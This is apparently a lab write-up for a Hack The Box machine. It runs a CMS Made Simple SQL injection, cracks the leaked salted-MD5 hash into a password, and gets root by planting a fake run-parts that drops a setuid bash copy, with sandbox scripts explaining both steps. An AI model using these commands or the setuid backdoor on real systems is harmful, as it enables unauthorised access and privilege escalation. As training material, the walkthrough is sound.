Basic information

Port scan

Only 22 and 80 are open:

```
$ nmap -sC -sV 10.10.10.138

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-12 14:53 CST
Nmap scan report for 10.10.10.138
Host is up (0.070s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.37 seconds
```

Port 80

The page itself warns against automated scanning, because it would generate a flood of HTTP 400 responses, so enumerate by hand:

robots.txt reveals a /writeup/ path:

(screenshot: robots.txt listing /writeup/)

The application there is CMS Made Simple:

(screenshot: CMS Made Simple)

A search turns up a relevant vulnerability for this version, a SQL injection:

(screenshot: SQL injection advisory)

The SQL injection leaks the admin's username, password hash and salt; cracking the hash gives the credentials for jkr. CMS Made Simple stores md5(salt . password), which is hashcat mode 20 (md5($salt.$pass)), so the input line is written as hash:salt:

```
python sql.py -u http://10.10.10.138/writeup/
[+] Salt for password found: 5a599ef57905
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

62def4866937f08cc13bab43bb14e6f7:5a599ef579066807

sudo hashcat -a 0 -m 20 hash.txt /usr/share/wordlists/rockyou.txt

62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9
```
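To make explicit what hashcat -m 20 is computing, here is an added example (written for this page, not part of the original writeup or of any exploit script) that reproduces the salted-MD5 check in plain shell: concatenate the salt and the candidate, MD5 it, compare with the target. It assumes GNU coreutils md5sum and a one-candidate-per-line wordlist; the three-line wordlist used in the demo is constructed here as a stand-in for rockyou.txt.

```shell
#!/bin/sh
# Added example, not from the original writeup: CMS Made Simple stores
# md5(salt . password); hashcat mode 20 (md5($salt.$pass)) brute-forces exactly this.
# Assumptions: GNU coreutils md5sum is available; wordlist has one candidate per line.

# crack_salted_md5 TARGET_HASH SALT WORDLIST
#   prints the candidate whose md5(salt . candidate) equals TARGET_HASH, exit 1 if none
crack_salted_md5() {
  target=$1; salt=$2; wordlist=$3
  while IFS= read -r cand || [ -n "$cand" ]; do
    # same concatenation order as hashcat -m 20: salt first, then the password
    h=$(printf '%s%s' "$salt" "$cand" | md5sum | cut -d' ' -f1)
    if [ "$h" = "$target" ]; then
      printf '%s\n' "$cand"
      return 0
    fi
  done < "$wordlist"
  return 1
}

# hashcat_line TARGET_HASH SALT -> the "hash:salt" line format that -m 20 expects in hash.txt
hashcat_line() {
  printf '%s:%s\n' "$1" "$2"
}

# Demo with the hash and salt recovered from the box. The wordlist is a tiny
# constructed stand-in for rockyou.txt.
demo_wordlist=$(mktemp)
printf 'password\nraykayjay9\nletmein\n' > "$demo_wordlist"
echo "hash.txt line: $(hashcat_line 62def4866937f08cc13bab43bb14e6f7 5a599ef579066807)"
crack_salted_md5 62def4866937f08cc13bab43bb14e6f7 5a599ef579066807 "$demo_wordlist" \
  || echo "no candidate in the wordlist matched"
rm -f "$demo_wordlist"
```

Getting the salt wrong (or swapping the order to password-then-salt, which is mode 10) silently produces no match rather than an error, which is why the salt reported by the injection must be copied in full into hash.txt.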

User flag

SSH in with the recovered credentials and read user.txt:

Privilege escalation enumeration

Running pspy (or a similar process monitor) shows that on every SSH login root executes the following (this is pam_motd regenerating the dynamic MOTD):

```
sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
run-parts --lsbsysinit /etc/update-motd.d
/bin/sh /etc/update-motd.d/10-uname
```

jkr is a member of the staff group, which on Debian owns /usr/local/bin and friends, so jkr can write into that directory:

That makes a PATH hijack of run-parts possible: env -i resets PATH to the fixed list above, in which /usr/local/bin is searched before /bin, where the real run-parts lives. Whatever jkr drops at /usr/local/bin/run-parts is therefore executed as root on the next login.

Privilege escalation & root flag

Plant a replacement run-parts that creates a setuid copy of bash, log in again over SSH to trigger it, then read root.txt:

```bash
echo -e '#!/bin/bash\n\ncp /bin/bash /bin/miao\nchmod u+s /bin/miao' > /usr/local/bin/run-parts; chmod +x /usr/local/bin/run-parts
```

Two practical caveats: bash drops the effective uid of a setuid copy unless it is started with -p, so run it as /bin/miao -p; and the planted file replaces the real MOTD generation for every subsequent login by any user, so remove /usr/local/bin/run-parts once root is obtained.
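The hijack works purely because of PATH search order under env -i. The following added example (written for this page, not part of the original writeup) simulates that locally without root: it builds a scratch tree with a fake /bin/run-parts and an impostor in a fake /usr/local/bin, then runs `run-parts` through the same `env -i PATH=...` form pam_motd uses, with the two directories in either order. Directory names under mktemp and the two stub scripts are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original writeup: simulate why a staff-writable
# /usr/local/bin beats /bin when pam_motd runs `env -i PATH=/usr/local/sbin:/usr/local/bin:...
# run-parts`. PATH is searched left to right; the first match is executed.
# Assumptions: scratch dirs from mktemp -d, no root required.

# run_as_pam_motd_would FIRST_DIR SECOND_DIR
#   executes run-parts from a clean environment with PATH="$FIRST_DIR:$SECOND_DIR",
#   mirroring the env -i invocation captured with pspy
run_as_pam_motd_would() {
  env -i PATH="$1:$2" run-parts
}

# setup_sandbox -> creates fake bin/ and usr/local/bin/ and prints the sandbox root
setup_sandbox() {
  root=$(mktemp -d)
  mkdir -p "$root/bin" "$root/usr/local/bin"
  # stand-in for the genuine /bin/run-parts
  printf '#!/bin/sh\necho genuine\n' > "$root/bin/run-parts"
  # impostor that a staff-group member could drop into /usr/local/bin
  printf '#!/bin/sh\necho hijacked\n' > "$root/usr/local/bin/run-parts"
  chmod +x "$root/bin/run-parts" "$root/usr/local/bin/run-parts"
  printf '%s\n' "$root"
}

# which_run_parts_wins local-first|bin-first -> "hijacked" or "genuine"
which_run_parts_wins() {
  root=$(setup_sandbox)
  if [ "$1" = local-first ]; then
    # the real pam_motd PATH: /usr/local/bin comes before /bin
    out=$(run_as_pam_motd_would "$root/usr/local/bin" "$root/bin")
  else
    # what would happen if /bin were listed first: the impostor is never reached
    out=$(run_as_pam_motd_would "$root/bin" "$root/usr/local/bin")
  fi
  rm -rf "$root"
  printf '%s\n' "$out"
}

echo "PATH with /usr/local/bin first: $(which_run_parts_wins local-first)"
echo "PATH with /bin first:           $(which_run_parts_wins bin-first)"
```

The same logic is what makes the fix obvious from the defender's side: either /usr/local/bin must not be writable by unprivileged groups, or privileged scripts must invoke run-parts by absolute path instead of relying on a PATH lookup.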

References